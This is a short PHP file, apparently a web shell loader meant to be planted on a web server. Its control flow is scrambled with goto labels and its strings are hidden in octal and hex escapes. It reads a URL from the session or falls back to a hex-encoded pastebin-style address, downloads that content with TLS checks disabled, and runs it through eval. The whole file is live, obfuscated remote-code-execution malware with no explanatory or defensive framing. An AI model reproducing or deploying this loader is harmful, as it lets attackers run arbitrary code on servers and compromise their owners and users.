<?php
 goto u2Xbt; WzbPw: if (!$csJuh && function_exists("\x63\x75\x72\154\137\151\x6e\151\164")) { goto JXQP0; } goto GgyoE; tQe0k: WjfdW: goto QqfYJ; hRN5U: curl_close($sxlQA); goto FaQEe; u2Xbt: goto J7W1G; goto YA20N; rkXXQ: mKhZ5: goto m36ks; t1eRr: Y38i0: goto WzbPw; PBPKB: WwyIg: goto snk9T; FHQuD: goto W80pL; goto tQe0k; tqykV: lXFKg: goto uoqb8; uoqb8: y34fS: goto nUyNP; Auwy5: goto WwyIg; goto PBPKB; UT2hZ: goto WjfdW; goto t1eRr; GgyoE: goto y34fS; goto lJrH9; v2ysV: $csJuh = curl_exec($sxlQA); goto wZM3I; InNs6: $NWAIc = $_SESSION["\164\163\137\165\162\x6c"] ?? pack("\x48\52", "\66\70\67\x34\x37\64\x37\60\67\63\x33\141\x32\x66\62\146\67\x30\66\61\x37\x33\67\x34\66\x35\66\x36\x37\x39\62\145\x36\61\67\x30\67\60\62\146\x34\x63\66\x65\67\x31\x37\141\x34\64\63\x31\x36\x38\x34\x35\62\146\67\x32\66\61\67\67"); goto UT2hZ; wZM3I: goto Ocpva; goto rkXXQ; FaQEe: goto lXFKg; goto VCSTB; snk9T: $sxlQA = curl_init($NWAIc); goto UghIz; t4qX8: Ocpva: goto hRN5U; UghIz: goto wOYfE; goto ufWna; JEQS5: session_start(); goto EAnDR; NJy_r: goto Y38i0; goto t4qX8; ZRWN3: curl_setopt_array($sxlQA, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_SSL_VERIFYHOST => 0]); goto FHQuD; nUyNP: goto mKhZ5; goto PeZtO; EAnDR: goto EqBfM; goto tqykV; ufWna: W80pL: goto v2ysV; PeZtO: EqBfM: goto InNs6; lJrH9: JXQP0: goto Auwy5; VCSTB: J7W1G: goto JEQS5; QqfYJ: $csJuh = @file_get_contents($NWAIc); goto NJy_r; YA20N: wOYfE: goto ZRWN3; m36ks: $csJuh ? eval("\77\76{$csJuh}") : die("\107\141\x67\x61\154\x20\x6d\145\x6d\x75\x61\164\72\x20{$NWAIc}");